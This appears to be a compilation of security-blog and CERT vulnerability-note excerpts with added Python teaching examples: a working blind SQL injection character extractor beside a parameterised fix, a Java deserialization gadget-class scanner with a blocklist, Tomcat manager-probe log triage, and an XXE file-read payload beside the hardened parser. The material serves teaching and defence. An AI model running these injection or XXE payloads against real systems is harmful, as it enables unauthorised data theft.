Although a lot has been written about SQL injection vulnerabilities, they can still be found relatively often. In most of the cases I've seen in the last couple of years, I had to deal with blind SQL injection vulnerabilities.
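Worked example, added here and not part of the post above: a boolean-based blind SQL injection run end to end against an in-memory SQLite table, with the parameterised version of the same lookup beside it. The users table, the row for alice and the pw_hash value are constructed for the demo; the endpoint only answers "row found / not found", which is the blind situation the post refers to.

```python
"""Boolean-based blind SQL injection, end to end, against an in-memory SQLite
database. Constructed sample: the users table, the row for 'alice' and the
pw_hash value are made up here so the script runs offline."""
import sqlite3

SECRET_HASH = "5f4dcc3b5aa765d6"  # constructed value, not a real hash


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users (name, pw_hash) VALUES (?, ?)", ("alice", SECRET_HASH))
    conn.commit()
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, name: str) -> bool:
    """Deliberately vulnerable: the name is concatenated into the SQL.
    The caller only learns whether a row came back; no data and no error
    text is returned, which is what makes the injection 'blind'."""
    sql = "SELECT 1 FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


def user_exists_fixed(conn: sqlite3.Connection, name: str) -> bool:
    """Hardened: bound parameter, so the payload is just an unusual username."""
    row = conn.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


def extract_column(oracle, column: str = "pw_hash", max_len: int = 64) -> str:
    """Recover a column value one character at a time using only the
    true/false answer. Binary search over printable ASCII costs about seven
    queries per character instead of up to 95 guesses.
    SQLite specifics: substr() is 1-indexed, unicode() gives the code point,
    and unicode('') is NULL, so the first probe is false past the end of the
    value (that is how the loop detects the string's length)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        def probe(v: int) -> bool:
            # Closes the quote, appends the condition, comments out the rest.
            return oracle(f"alice' AND unicode(substr({column},{pos},1)) >= {v} --")

        if not probe(32):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if probe(mid):
                lo = mid
            else:
                hi = mid - 1
        recovered += chr(lo)
    return recovered


def demo() -> tuple:
    """Runs the extraction against both endpoints; returns (leaked, blocked)."""
    conn = make_db()
    via_vuln = extract_column(lambda p: user_exists_vulnerable(conn, p))
    via_fixed = extract_column(lambda p: user_exists_fixed(conn, p))
    return via_vuln, via_fixed


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable endpoint leaked:", repr(leaked))
    print("parameterised endpoint leaked:", repr(blocked))
```

Each recovered character costs seven probes; a real target adds network latency and, when even the true/false signal is missing, a time-based variant using the database's sleep function. The fix is the bound parameter, not input filtering: the same payload sent to user_exists_fixed recovers nothing.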
The following is cross-posted from HolisticInfoSec. Happy New Year and welcome to 2016! When last we explored red team versus blue team tactics in May 2015, we utilized Invoke-Mimikatz, then reviewed and analyzed a victim with WinPmem and Rekall.
Vulnerability Note VU#377260 Up.time agent for Windows contains multiple vulnerabilities Original Release date: 08 Dec 2015 | Last revised: 08 Dec 2015 Overview The Up.time client for Windows is vulnerable to a format string attack as well as a buffer overflow, and may allow unauthenticated users to perform certain commands. Description CWE-134: Uncontrolled Format String – CVE-2015-2894 In versions 6.0 and 7.2, an unauthenticated attacker on the network may send the "%n" or "%s" format parameter, which will cause the application to crash. CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') – CVE-2015-2895 In version 7.4, an unauthenticated attacker on the network sending a command with an input larger than 1024 bytes will crash the application.
Vulnerability Note VU#576313 Apache Commons Collections Java library insecurely deserializes data Original Release date: 13 Nov 2015 | Last revised: 13 Nov 2015 Overview The Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution.
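Added detection example, not code from the CERT note or from Apache Commons: Java serialized objects are easy to spot on the wire because the stream starts with the fixed magic 0xACED0005 and carries class names as plain, length-prefixed strings inside TC_CLASSDESC records. The scanner below pulls those names out and matches them against the Commons Collections functor classes that the public gadget chains rely on. The class list and the hand-built sample stream are assumptions for the demo, not taken from the note.

```python
"""Spot Java serialized objects and flag Commons Collections gadget classes
before an ObjectInputStream ever sees them.

Byte layout follows the Java Object Serialization Stream Protocol: magic
0xACED, version 0x0005, TC_OBJECT 0x73, TC_CLASSDESC 0x72 followed by a
big-endian u2 length and the class name. The sample payload is constructed
by hand (only the class-descriptor prefix is modelled); it is not a captured
exploit."""
import re
import struct

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72

# Assumption: illustrative blocklist of classes used by the public Commons
# Collections gadget chains; a real deployment keeps this in configuration.
GADGET_CLASSES = {
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections.functors.InstantiateTransformer",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections4.functors.InvokerTransformer",
}

_JAVA_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")


def is_java_serialized(data: bytes) -> bool:
    return data.startswith(JAVA_SERIAL_MAGIC)


def class_names(data: bytes) -> list:
    """Linear scan for TC_CLASSDESC + length-prefixed class name.
    Heuristic: a stray 0x72 ('r') inside string data can look like a record
    start, so each candidate is validated against Java identifier syntax and
    consumed whole once accepted."""
    names = []
    i = len(JAVA_SERIAL_MAGIC) if is_java_serialized(data) else 0
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (n,) = struct.unpack(">H", data[i + 1:i + 3])
            cand = data[i + 3:i + 3 + n]
            if n and len(cand) == n and _JAVA_NAME.match(cand):
                names.append(cand.decode("ascii"))
                i += 3 + n
                continue
        i += 1
    return names


def gadget_hits(data: bytes) -> list:
    """Class names in the stream that belong to the blocklist (empty if the
    bytes are not a Java serialization stream at all)."""
    if not is_java_serialized(data):
        return []
    return [n for n in class_names(data) if n in GADGET_CLASSES]


def build_sample(cls: str) -> bytes:
    """Constructed stand-in for the start of an ObjectInputStream payload
    whose first object is of class `cls`."""
    name = cls.encode("ascii")
    return (JAVA_SERIAL_MAGIC
            + bytes([TC_OBJECT, TC_CLASSDESC])
            + struct.pack(">H", len(name)) + name
            + b"\x00" * 8      # serialVersionUID (placeholder value)
            + b"\x02"          # classDescFlags: SC_SERIALIZABLE
            + b"\x00\x00")     # field count


if __name__ == "__main__":
    for cls in ("java.util.HashMap",
                "org.apache.commons.collections.functors.InvokerTransformer"):
        blob = build_sample(cls)
        print(cls, "->", gadget_hits(blob) or "no gadget class")
```

This is a pre-filter for an IDS rule or a request wrapper, not a fix: the remediation is to stop deserializing untrusted input, or to enforce a class allowlist in ObjectInputStream.resolveClass before any object is constructed. A scan on raw bytes also misses streams that arrive compressed or base64-encoded, which the caller has to unwrap first.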
On a quiet, rainy Sunday I would like to talk about NIST 800-12. I am sharing this to help raise awareness, as much for our regular supporters as for those around us who may not fully grok the whole of a computer security program.
Over the last couple of days, a paper with details about XARA vulnerabilities in OS X and iOS has been getting a lot of attention. If you haven't seen the term XARA before, that is probably because cross-application resource access was normal in the past.
Last month, I blogged about security researcher Chris Roberts being detained by the FBI after tweeting about avionics security while on a United flight. But to me, the fascinating part of this story is that a computer was monitoring the Twitter feed and understood the obscure references, alerted a person who figured out who wrote them, researched what flight he was on, and sent an FBI team to the Syracuse airport within a couple of hours. There's some serious surveillance going on. We know a lot more of the back story from the FBI's warrant application.
In our honeypots, we recently saw a spike of requests for http://[ip address]:8080/manager/html. These requests appear to target the Apache Tomcat server. In case you haven't heard of Tomcat before (unlikely): it is a Java Servlet and JavaServer Pages technology.
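Added triage example, not from the diary: parsing Tomcat access-log lines in the default "common" AccessLogValve pattern (%h %l %u %t "%r" %s %b) and grouping requests for the Manager application by client address, the check you would run on your own logs after reading the diary. The six log lines are constructed with documentation-range IPs; the threshold and the path prefixes are assumptions.

```python
"""Triage of Tomcat access-log lines for Manager application probes.

SAMPLE_LOG is constructed for the demo in Tomcat's default "common" access
log pattern; the addresses are documentation ranges."""
import re
from collections import Counter, defaultdict

SAMPLE_LOG = """\
198.51.100.9 - - [02/Mar/2015:10:15:22 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.9 - - [02/Mar/2015:10:15:23 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.9 - - [02/Mar/2015:10:15:24 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.9 - tomcat [02/Mar/2015:10:15:25 +0000] "GET /manager/html HTTP/1.1" 403 3022
192.0.2.77 - - [02/Mar/2015:10:16:01 +0000] "GET /index.jsp HTTP/1.1" 200 1843
203.0.113.4 - - [02/Mar/2015:10:17:40 +0000] "GET /manager/text/list HTTP/1.1" 404 1025
""".splitlines()

# %h %l %u %t "%r" %s %b  (request line split into method, path, protocol)
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)$')

# Assumption: the paths we treat as Manager-app probes.
MANAGER_PREFIXES = ("/manager/", "/host-manager/")


def parse_clf(line: str):
    """One log line -> dict of fields, or None if it is not in common format."""
    m = CLF.match(line)
    return m.groupdict() if m else None


def manager_probes(lines, threshold: int = 3) -> dict:
    """Group Manager-app requests by client IP and return the clients that
    made at least `threshold` of them, with a status-code breakdown and the
    distinct paths they touched."""
    per_ip = defaultdict(lambda: {"count": 0, "status": Counter(), "paths": set()})
    for line in lines:
        rec = parse_clf(line)
        if rec is None or not rec["path"].startswith(MANAGER_PREFIXES):
            continue
        entry = per_ip[rec["ip"]]
        entry["count"] += 1
        entry["status"][rec["status"]] += 1
        entry["paths"].add(rec["path"])
    return {
        ip: {"count": e["count"], "status": dict(e["status"]), "paths": sorted(e["paths"])}
        for ip, e in per_ip.items()
        if e["count"] >= threshold
    }


if __name__ == "__main__":
    for ip, summary in manager_probes(SAMPLE_LOG).items():
        print(ip, summary)
```

Repeated 401s from one address are the credential-guessing signature. A 403 that carries a username in the %u field is different: the password was accepted but the account lacks the manager role, which means someone already holds a valid Tomcat credential and deserves a closer look. Lowering the threshold to 1 on a honeypot, where no request to /manager/ is legitimate, turns the function into a simple probe list.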
Vulnerability Note VU#377644 Ektron Content Management System (CMS) contains multiple vulnerabilities Original Release date: 05 Feb 2015 | Last revised: 05 Feb 2015 Overview Ektron Content Management System (CMS) versions 8.5, 8.7, and 9.1 contain an XXE and a resource injection vulnerability. Description CWE-611: Improper Restriction of XML External Entity Reference ('XXE') – CVE-2015-0923 Ektron Content Management System versions 8.5, 8.7, and 9.1 contain an XXE vulnerability in /Workarea/ServerControlWS.asmx. The xslt parameter of the ContentBlockEx method allows a remote unauthenticated user to read arbitrary files.
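Added example of the mechanism behind the note, not Ektron's code and not a reproduction of the ServerControlWS.asmx request: a DOCTYPE that declares an external entity pointing at a local file, parsed once with external general entity resolution on (the vulnerable setting) and once with it off, using only Python's standard library. The secret file is created in a temporary directory, and a POSIX path is assumed for the file:// URL.

```python
"""XXE: the vulnerable parse beside the hardened one, standard library only.

The attacker document, the secret file and its contents are constructed for
the demo. xml.sax's expat reader resolves external general entities only
when feature_external_ges is on (the default before Python 3.7.1)."""
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class TextCollector(xml.sax.ContentHandler):
    """Gathers character data, which is where an expanded entity ends up."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_text(xml_bytes: bytes, resolve_external: bool) -> str:
    """resolve_external=True is the vulnerable configuration, False the fix."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts).strip()


_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)


def dtd_free(xml_bytes: bytes) -> bool:
    """Defence in depth for endpoints that never need a DTD: True when the
    document carries no DOCTYPE at all. A byte match can be dodged with an
    unexpected encoding, so this is a pre-filter, not the fix."""
    return _DOCTYPE.search(xml_bytes) is None


def xxe_payload(file_url: str) -> bytes:
    """Constructed attacker document. The element name mirrors the 'xslt'
    parameter from the note; nothing else about the request is modelled."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE x [<!ENTITY xxe SYSTEM "{file_url}">]>\n'
        '<xslt>&xxe;</xslt>'
    ).encode()


def demo() -> dict:
    """Writes a secret file, then parses the payload both ways."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as fh:
            fh.write("db_password=hunter2")  # constructed secret
        payload = xxe_payload("file://" + secret_path)
        return {
            "leaked": parse_text(payload, resolve_external=True),
            "hardened": parse_text(payload, resolve_external=False),
            "payload_is_dtd_free": dtd_free(payload),
            "clean_doc_is_dtd_free": dtd_free(b"<xslt>hello</xslt>"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Turning off external general entity resolution at the parser is the fix, and it is what makes the same payload yield an empty element in the hardened run. Rejecting any DOCTYPE is a useful extra for endpoints that never need one, but on its own it is bypassable, so it should sit in front of a parser that is already configured not to resolve entities. For a .NET service like the one in the note the equivalent knob is the XmlReaderSettings DTD processing and resolver settings rather than a SAX feature.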